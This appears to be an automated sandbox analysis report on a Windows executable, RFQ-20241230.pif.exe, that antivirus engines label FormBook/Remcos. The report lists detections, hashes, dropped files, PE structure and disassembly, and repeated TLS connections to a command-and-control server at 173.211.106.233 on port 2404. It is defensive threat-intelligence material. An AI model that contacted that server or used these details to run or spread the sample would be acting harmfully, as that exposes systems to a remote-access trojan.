                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ-20241230.pif.exe74%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                RFQ-20241230.pif.exe100%AviraHEUR/AGEN.1309540
                RFQ-20241230.pif.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                		13.107.246.45
                		truefalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpRFQ-20241230.pif.exefalse
                    		high
                    http://geoplugin.net/json.gp/CRFQ-20241230.pif.exe, 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ-20241230.pif.exe, 00000000.00000002.1360288843.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        173.211.106.233
                        		unknownUnited States
                        		46261QUICKPACKETUStrue

                        General Information

                        Joe Sandbox version:42.0.0 Malachite
                        Analysis ID:1586923
                        Start date and time:2025-01-09 19:02:12 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 40s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:11
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:RFQ-20241230.pif.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.expl.evad.winEXE@7/6@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 93%
                        • Number of executed functions: 94
                        • Number of non-executed functions: 194
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 23.56.254.164, 20.12.23.50
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: RFQ-20241230.pif.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        13:03:05API Interceptor4918715x Sleep call for process: RFQ-20241230.pif.exe modified
                        13:03:07API Interceptor13x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        173.211.106.233Suppliers_Data.pif.exeGet hashmaliciousRemcosBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          s-part-0017.t-0009.t-msedge.net24 UA10005 TCS-condaco-Lease_7_oct.xlam.xlsxGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.246.45
                          ReIayMSG__polarisrx.com_#6577807268.htmGet hashmaliciousHTMLPhisherBrowse
                          • 13.107.246.45
                          Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          PO_62401394_MITech_20250701.exeGet hashmaliciousFormBookBrowse
                          • 13.107.246.45
                          Fqtwswg.exeGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          BPD-003777.exeGet hashmaliciousUnknownBrowse
                          • 13.107.246.45
                          new.batGet hashmaliciousUnknownBrowse
                          • 13.107.246.45

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          QUICKPACKETUSSuppliers_Data.pif.exeGet hashmaliciousRemcosBrowse
                          • 173.211.106.233
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          https://z97f4f2525fyg27.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                          • 172.82.129.154
                          9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          c2.htaGet hashmaliciousRemcosBrowse
                          • 193.26.115.39
                          Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                          • 193.31.28.181

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ-20241230.pif.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\RFQ-20241230.pif.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.380805901110357
                          Encrypted:false
                          SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:lGLHyIFKL3IZ2KRH9Oug8s
                          MD5:F9B7CF60C22DBE6B73266580FFD54629
                          SHA1:05ED734C0A5EF2ECD025D4E39321ECDC96612623
                          SHA-256:880A3240A482AB826198F84F548F4CB5B906E4A2D7399D19E3EF60916B8D2D89
                          SHA-512:F55EFB17C1A45D594D165B9DC4FA2D1364B38AA2B0D1B3BAAE6E1E14B8F3BD77E3A28B7D89FA7F6BF3EEF3652434228B1A42BF9851F2CFBB6A7DCC0254AAAE38
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2axvjcty.y01.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52f4ai0k.pxd.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtln3tux.g3q.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upatqsuf.jwx.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.852752390307954
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          • Win32 Executable (generic) a (10002005/4) 49.75%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:RFQ-20241230.pif.exe
                          File size:987'699 bytes
                          MD5:a2800b58845d5f108333e9f7f9c388dd
                          SHA1:1a1ce9b83de9d2e967a539aabeafdab36dbb626a
                          SHA256:b43ca133d57448c7afb42bffcb1ce756cdad70308d3f49c9c981fac24c55e76f
                          SHA512:150a651055ac9c697a2132eda8a24f8f1af58d37d8a140356afd24bff629307404691213d04db92ed5948f9f47d9ac0e3e7cea72903984d1ca4b336ccbf2c23f
                          SSDEEP:24576:FzrqD+VnGOgUL+oMIk2W/PpOlL46TFJtV:BqyVnCUaLnZONbTFJX
                          TLSH:592512582B4EE413C56557B51A70F5F41B6D6EDEA801D313AFE86EFBB962E102C08383
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg..............0......4......f.... ........@.. .......................`............`................................

                          File Icon

                          Icon Hash:16bb2d4d6ccc6593

                          Static PE Info

                          General

                          Entrypoint:0x4efb66
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6771FAF8 [Mon Dec 30 01:44:24 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          push ebx
                          add byte ptr [ecx+00h], bh
                          jnc 00007F600C808FA2h
                          je 00007F600C808FA2h
                          add byte ptr [ebp+00h], ch
                          add byte ptr [edx+00h], dl
                          add byte ptr [esi+00h], ah
                          insb
                          add byte ptr [ebp+00h], ah
                          arpl word ptr [eax], ax
                          je 00007F600C808FA2h
                          imul eax, dword ptr [eax], 006E006Fh
                          add byte ptr [ecx+00h], al
                          jnc 00007F600C808FA2h
                          jnc 00007F600C808FA2h
                          add byte ptr [ebp+00h], ch
                          bound eax, dword ptr [eax]
                          insb
                          add byte ptr [ecx+00h], bh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          dec esp
                          add byte ptr [edi+00h], ch
                          popad
                          add byte ptr [eax+eax+00h], ah
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xefb140x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf00000x3190.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000xedbac0xedc00b9958b4b84778810b74a71efb8fd4f67False0.9464030461356467data7.855220500565996IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0xf00000x31900x32006994df73fe190be41d32c86321fdf776False0.941953125data7.778297678837111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xf40000xc0x2008ceca42ace011e0ef1e8e1997344e4cdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xf00c80x2d81PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9937333676710447
                          RT_GROUP_ICON0xf2e5c0x14data1.05
                          RT_VERSION0xf2e800x30cdata0.4307692307692308

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2025-01-09T19:03:28.977389+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949734173.211.106.2332404TCP
                          2025-01-09T19:03:51.431052+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949865173.211.106.2332404TCP
                          2025-01-09T19:04:13.902031+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949978173.211.106.2332404TCP
                          2025-01-09T19:04:36.295670+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949981173.211.106.2332404TCP
                          2025-01-09T19:04:58.703809+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949982173.211.106.2332404TCP
                          2025-01-09T19:05:21.120704+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949983173.211.106.2332404TCP
                          2025-01-09T19:05:43.528036+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949984173.211.106.2332404TCP
                          2025-01-09T19:06:05.950386+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949985173.211.106.2332404TCP
                          2025-01-09T19:06:28.391569+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949986173.211.106.2332404TCP
                          2025-01-09T19:06:50.872655+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949987173.211.106.2332404TCP
                          2025-01-09T19:07:13.376765+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.949988173.211.106.2332404TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 9, 2025 19:03:07.591609955 CET497342404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:07.596570015 CET240449734173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:07.596649885 CET497342404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:07.602904081 CET497342404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:07.607733965 CET240449734173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:28.977242947 CET240449734173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:28.977389097 CET497342404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:28.977502108 CET497342404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:28.982247114 CET240449734173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:29.991940975 CET498652404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:29.996831894 CET240449865173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:29.997052908 CET498652404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:30.000952005 CET498652404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:30.007042885 CET240449865173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:51.430953026 CET240449865173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:51.431051970 CET498652404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:51.431134939 CET498652404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:51.435937881 CET240449865173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:52.443906069 CET499782404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:52.448949099 CET240449978173.211.106.233192.168.2.9
                          Jan 9, 2025 19:03:52.449198961 CET499782404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:52.453545094 CET499782404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:03:52.458406925 CET240449978173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:13.901959896 CET240449978173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:13.902030945 CET499782404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:13.902134895 CET499782404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:13.906991005 CET240449978173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:14.915344000 CET499812404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:14.920386076 CET240449981173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:14.923599005 CET499812404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:14.927340984 CET499812404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:14.932131052 CET240449981173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:36.292727947 CET240449981173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:36.295670033 CET499812404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:36.295715094 CET499812404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:36.300612926 CET240449981173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:37.315462112 CET499822404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:37.320329905 CET240449982173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:37.320400953 CET499822404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:37.326225042 CET499822404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:37.331043005 CET240449982173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:58.703742027 CET240449982173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:58.703809023 CET499822404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:58.703885078 CET499822404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:58.710937023 CET240449982173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:59.709861994 CET499832404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:59.714672089 CET240449983173.211.106.233192.168.2.9
                          Jan 9, 2025 19:04:59.714796066 CET499832404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:59.717870951 CET499832404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:04:59.722613096 CET240449983173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:21.120630980 CET240449983173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:21.120703936 CET499832404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:21.120744944 CET499832404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:21.125536919 CET240449983173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:22.136312008 CET499842404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:22.141917944 CET240449984173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:22.142040014 CET499842404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:22.145411968 CET499842404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:22.150948048 CET240449984173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:43.527261019 CET240449984173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:43.528036118 CET499842404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:43.528036118 CET499842404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:43.532934904 CET240449984173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:44.569204092 CET499852404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:44.574254036 CET240449985173.211.106.233192.168.2.9
                          Jan 9, 2025 19:05:44.574451923 CET499852404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:44.599128008 CET499852404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:05:44.603992939 CET240449985173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:05.950318098 CET240449985173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:05.950386047 CET499852404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:05.950433969 CET499852404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:05.955207109 CET240449985173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:06.960225105 CET499862404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:06.965121984 CET240449986173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:06.966147900 CET499862404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:06.969716072 CET499862404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:06.974509001 CET240449986173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:28.387813091 CET240449986173.211.106.233192.168.2.9
                          Jan 9, 2025 19:06:28.391568899 CET499862404192.168.2.9173.211.106.233
                          Jan 9, 2025 19:06:28.392383099 CET499862404192.168.2.9173.211.106.233
